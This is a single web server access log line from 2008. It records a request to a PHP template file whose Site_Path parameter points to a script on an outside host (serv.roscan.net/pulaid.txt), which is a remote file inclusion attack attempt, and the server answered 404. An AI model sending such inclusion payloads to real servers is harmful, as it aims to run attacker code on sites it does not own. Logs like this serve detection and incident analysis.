69.73.159.237 - - [08/Dec/2008:11:30:00 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://serv.roscan.net/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com" 69.73.159.237 - -